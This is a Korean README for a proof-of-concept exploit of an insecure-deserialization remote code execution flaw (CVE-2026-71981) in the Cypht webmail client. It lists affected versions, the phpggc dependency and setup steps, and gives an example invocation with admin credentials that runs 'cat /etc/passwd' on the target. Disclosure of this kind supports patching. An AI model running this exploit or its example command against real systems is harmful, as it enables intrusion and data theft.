
CVE-2026-71981에 대한 개념 증명 익스플로잇으로, Cypht의 안전하지 않은 역직렬화 RCE입니다. 로그아웃 응답을 통해 명령을 실행하고 출력을 출력합니다. 페이로드 생성에는 phpggc가 필요합니다.
CVE-2026-71981 안전하지 않은 역직렬화 RCE에 대한 PoC입니다. 실행된 명령의 결과는 로그아웃 요청에 대한 응답에서 </body></html> 태그 이후에 출력됩니다. 전체 응답도 출력하려면 --print-all을 사용하세요.
취약한 버전: < v2.12.2
이 스크립트는 unserialize() 페이로드를 생성하기 위해 설치된 https://github.com/ambionics/phpggc 가 필요합니다.
설정 및 예시:
python3 -m venv .venv
source ./.venv/bin/activate
python3 -m pip install -r requirements.txt
python3 ./poc.py --ip 127.0.0.1 --username admin --password admin --command "cat /etc/passwd"
python3 ./poc.py --help